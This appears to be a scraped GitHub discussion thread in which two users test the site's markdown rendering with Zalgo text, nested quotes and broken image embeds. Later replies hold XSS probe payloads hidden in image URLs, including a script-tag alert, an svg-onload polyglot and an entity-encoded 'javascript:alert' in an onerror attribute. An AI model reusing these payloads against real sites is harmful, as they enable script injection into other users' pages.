### DISCUSSION TITLE
"<>T̮̕o̘̙ ̺́i̘͓̖n҉̰̦͚̖̳v̶̟̼̳̥͚̺̙o̹̟͇̖̖͜k̸̭̟̫̮̹e̴̠̹̠͕͖̹ ̨̜̰t̬̹͖̜͎͇h̛̩̰̳e̳̹͇ͅ ... </del>""<>T̮̕o̘̙ ̺́i̘͓̖n҉̰̦͚̖̳v̶̟̼̳̥͚̺̙o̹̟͇̖̖͜k̸̭̟̫̮̹e̴̠̹̠͕͖̹ ̨̜̰t̬̹͖̜͎͇h̛̩̰̳e̳̹͇ͅ ... </del>""<>

### DISCUSSION THREAD

**Discussion by edunad** [edunad/edunad#6] [General]
https://github.com/edunad/---.---/pull/1

**Comment by D3lta** [comment]
![image](https://127.0.0.1/?png)

**Reply by edunad** [reply]
<a/>"<span/><<html>>T̮̕o̘̙ ̺́i̘͓̖n҉̰̦͚̖̳v̶̟̼̳̥͚̺̙o̹̟͇̖̖͜k̸̭̟̫̮̹e̴̠̹̠͕͖̹ ̨̜̰t̬̹͖̜͎͇h̛̩̰̳e̳̹͇ͅ ...` </del>"`<a/>"<span/><<html>>T̮̕o̘̙ ̺́i̘͓̖n҉̰̦͚̖̳v̶̟̼̳̥͚̺̙o̹̟͇̖̖͜k̸̭̟̫̮̹e̴̠̹̠͕͖̹ ̨̜̰t̬̹͖̜͎͇h̛̩̰̳e̳̹͇ͅ ...` on Jun 21, 2019

**Reply by D3lta** [reply]
> "<>T̮̕o̘̙ ̺́i̘͓̖n҉̰̦͚̖̳v̶̟̼̳̥͚̺̙o̹̟͇̖̖͜k̸̭̟̫̮̹e̴̠̹̠͕͖̹ ̨̜̰t̬̹͖̜͎͇h̛̩̰̳e̳̹͇ͅ ...` </del>"`"<>T̮̕o̘̙ ̺́i̘͓̖n҉̰̦͚̖̳v̶̟̼̳̥͚̺̙o̹̟͇̖̖͜k̸̭̟̫̮̹e̴̠̹̠͕͖̹ ̨̜̰t̬̹͖̜͎͇h̛̩̰̳e̳̹͇ͅ ...` on Jun 21, 2019

![Uploading image.png…]()

**Reply by edunad** [reply]
"<>T̮̕o̘̙ ̺́i̘͓̖n҉̰̦͚̖̳v̶̟̼̳̥͚̺̙o̹̟͇̖̖͜k̸̭̟̫̮̹e̴̠̹̠͕͖̹ ̨̜̰t̬̹͖̜͎͇h̛̩̰̳e̳̹͇ͅ ... </del>""<>T̮̕o̘̙ ̺́i̘͓̖n҉̰̦͚̖̳v̶̟̼̳̥͚̺̙o̹̟͇̖̖͜k̸̭̟̫̮̹e̴̠̹̠͕͖̹ ̨̜̰t̬̹͖̜͎͇h̛̩̰̳e̳̹͇ͅ ..

**Reply by D3lta** [reply]
> "<>T̮̕o̘̙ ̺́i̘͓̖n҉̰̦͚̖̳v̶̟̼̳̥͚̺̙o̹̟͇̖̖͜k̸̭̟̫̮̹e̴̠̹̠͕͖̹ ̨̜̰t̬̹͖̜͎͇h̛̩̰̳e̳̹͇ͅ ... ""<>T̮̕o̘̙ ̺́i̘͓̖n҉̰̦͚̖̳v̶̟̼̳̥͚̺̙o̹̟͇̖̖͜k̸̭̟̫̮̹e̴̠̹̠͕͖̹ ̨̜̰t̬̹͖̜͎͇h̛̩̰̳e̳̹͇ͅ ..

![Uploading image.png…]()
![Uploading image.png…]()

**Reply by edunad** [reply]
Uploading image.png…
Uploading image.png…
Uploading image.png…
Uploading image.png…
Uploading image.png…
Uploading image.png…

**Reply by edunad** [reply]
. </del>"

**Reply by D3lta** [reply]
> Uploading image.png…
> Uploading image.png…
> Uploading image.png…
> Uploading image.png…
> Uploading image.png…
> Uploading image.png…

>> > >> >  >> >  >> >  >> >  >> >  >> >  >> >  >> >  >> >  >> >  >> >  >> >   ![image](![image](https://user-images.githubusercontent.com/4348286/111007600-829fba00-838f-11eb-9cc0-1fd72b6ca9b0.png)

![image](https://user-images.githubusercontent.com/4348286/111007600-829fba00-838f-11eb-9cc0-1fd72b6ca9b0.png)
https://i.d3lta.eu/XSqImpQ.png

**Reply by D3lta** [reply]
> > Uploading image.png…
> > Uploading image.png…
> > Uploading image.png…
> > Uploading image.png…
> > Uploading image.png…
> > Uploading image.png…
> 
> > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > ![image](![image](https://user-images.githubusercontent.com/4348286/111007600-829fba00-838f-11eb-9cc0-1fd72b6ca9b0.png)
> 
> ![image](https://user-images.githubusercontent.com/4348286/111007600-829fba00-838f-11eb-9cc0-1fd72b6ca9b0.png)
> https://i.d3lta.eu/XSqImpQ.png

![image](../../../../../../../../)

**Reply by D3lta** [reply]
> > Uploading image.png…
> > Uploading image.png…
> > Uploading image.png…
> > Uploading image.png…
> > Uploading image.png…
> > Uploading image.png…
> 
> > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > ![image](![image](https://user-images.githubusercontent.com/4348286/111007600-829fba00-838f-11eb-9cc0-1fd72b6ca9b0.png)
> 
> ![image](https://user-images.githubusercontent.com/4348286/111007600-829fba00-838f-11eb-9cc0-1fd72b6ca9b0.png)
> https://i.d3lta.eu/XSqImpQ.png

![image](https://../../../../../../../../../../../../../../../../../../../../../../../../../../../../?png<script>alert(1)</script>)

![image](https://./././?png&javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>)

**Reply by D3lta** [reply]
> > > Uploading image.png…
> > > Uploading image.png…
> > > Uploading image.png…
> > > Uploading image.png…
> > > Uploading image.png…
> > > Uploading image.png…
> > 
> > 
> > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > ![image](![image](https://user-images.githubusercontent.com/4348286/111007600-829fba00-838f-11eb-9cc0-1fd72b6ca9b0.png)
> > 
> > 
> > ![image](https://user-images.githubusercontent.com/4348286/111007600-829fba00-838f-11eb-9cc0-1fd72b6ca9b0.png)
> > https://i.d3lta.eu/XSqImpQ.png
> 
> ![image](https://camo.githubusercontent.com/f5e060a3a52fc936b26a3c13133847d9e4cc2684d22c13855323354dde0c95ed/68747470733a2f2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f3f706e67253343736372697074253345616c6572742831292533432f736372697074253345)
> 
> ![image](https://camo.githubusercontent.com/a945b654ed1e10591840e6afdb8661f61875e6753cdadb4d61d0c5a2a19485cf/68747470733a2f2f2e2f2e2f2e2f3f706e67266a6176617363726970743a2f2a2d2d2533452533432f7469746c652533452533432f7374796c652533452533432f74657874617265612533452533432f7363726970742533452533432f786d702533452533437376672f6f6e6c6f61643d272b2f2532322f2b2f6f6e6d6f7573656f7665723d312f2b2f2535422a2f2535422535442f2b616c6572742831292f2f27253345)

![image](https://camo.gith?png\)onerror="&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041">

**Reply by D3lta** [reply]
> "<>T̮̕o̘̙ ̺́i̘͓̖n҉̰̦͚̖̳v̶̟̼̳̥͚̺̙o̹̟͇̖̖͜k̸̭̟̫̮̹e̴̠̹̠͕͖̹ ̨̜̰t̬̹͖̜͎͇h̛̩̰̳e̳̹͇ͅ ...` </del>"`"<>T̮̕o̘̙ ̺́i̘͓̖n҉̰̦͚̖̳v̶̟̼̳̥͚̺̙o̹̟͇̖̖͜k̸̭̟̫̮̹e̴̠̹̠͕͖̹ ̨̜̰t̬̹͖̜͎͇h̛̩̰̳e̳̹͇ͅ ...` on Jun 21, 2019

> `` `` `` `` `` `` `` `` `` ``> `` `` `` `` `` `` `` `` `` ``> `` `` `` `` `` `` `` `` `` ``> `` `` `` `` `` `` `` `` `` ``> `` `` `` `` `` `` `` `` `` ``> `` `` `` `` `` `` `` `` `` ``> `` `` `` `` `` `` `` `` `` ``> `` `` `` `` `` `` `` `` `` ``> `` `` `` `` `` `` `` `` `` ``> `` `` `` `` `` `` `` `` `` ``> `` `` `` `` `` `` `` `` `` ``> `` `` `` `` `` `` `` `` `` ``> `` `` `` `` `` `` `` `` `` ``> `` `` `` `` `` `` `` `` `` ``> `` `` `` `` `` `` `` `` `` ``> `` `` `` `` `` `` `` `` `` ``> `` `` `` `` `` `` `` `` `` ``> `` `` `` `` `` `` `` `` `` ``> `` `` `` `` `` `` `` `` `` ``> `` `` `` `` `` `` `` `` `` ``> `` `` `` `` `` `` `` `` `` ``> `` `` `` `` `` `` `` `` `` ``> `` `` `` `` `` `` `` `` `` ``> `` `` `` `` `` `` `` `` `` ``> `` `` `` `` `` `` `` `` `` ``> `` `` `` `` `` `` `` `` `` ``> `` `` `` `` `` `` `` `` `` ``> `` `` `` `` `` `` `` `` `` ``> `` `` `` `` `` `` `` `` `` ``> `` `` `` `` `` `` `` `` `` ``> `` `` `` `` `` `` `` `` `` ``> `` `` `` `` `` `` `` `` `` ``> `` `` `` `` `` `` `` `` `` ``> `` `` `` `` `` `` `` `` `` ``> `` `` `` `` `` `` `` `` `` ``> `` `` `` `` `` `` `` `` `` ``> `` `` `` `` `` `` `` `` `` ``> `` `` `` `` `` `` `` `` `` ``> `` `` `` `` `` `` `` `` `` ``> `` `` `` `` `` `` `` `` `` ``> `` `` `` `` `` `` `` `` `` ``> `` `` `` `` `` `` `` `` `` ``> `` `` `` `` `` `` `` `` `` ``> `` `` `` `` `` `` `` `` `` ``> `` `` `` `` `` `` `` `` `` ``> `` `` `` `` `` `` `` `` `` ``> `` `` `` `` `` `` `` `` `` ``> `` `` `` `` `` `` `` `` `` ``> `` `` `` `` `` `` `` `` `` ``> `` `` `` `` `` `` `` `` `` ``> `` `` `` `` `` `` `` `` `` ``> `` `` `` `` `` `` `` `` `` ``> `` `` `` `` `` `` `` `` `` ``> `` `` `` `` `` `` `` `` `` ``> `` `` `` `` `` `` `` `` `` ``> `` `` `` `` `` `` `` `` `` ``> `` `` `` `` `` `` `` `` `` ``> `` `` `` `` `` `` `` `` `` ``> `` `` `` `` `` `` `` `` `` ``> `` `` `` `` `` `` `` `` `` ``> `` `` `` `` `` `` `` `` `` ``> `` `` `` `` `` `` `` `` `` ``> `` `` `` `` `` `` `` `` `` ``> `` `` `` `` `` `` `` `` `` ``> `` `` `` `` `` `` `` `` `` ``> `` `` `` `` `` `` `` `` `` ``> `` `` `` `` `` `` `` `` `` ``> `` `` `` `` `` `` `` `` `` ``> `` `` `` `` `` `` `` `` `` ``> `` `` `` `` `` `` `` `` `` ``> `` `` `` `` `` `` `` `` `` ``> `` `` `` `` `` `` `` `` `` ``> `` `` `` `` `` `` `` `` `` ``> `` `` `` `` `` `` `` `` `` ``> `` `` `` `` `` `` `` `` `` ``> `` `` `` `` `` `` `` `` `` ``> `` `` `` `` `` `` `` `` `` ``> `` `` `` `` `` `` `` `` `` ``> `` `` `` `` `` `` `` `` `` ``> `` `` `` `` `` `` `` `` `` ``
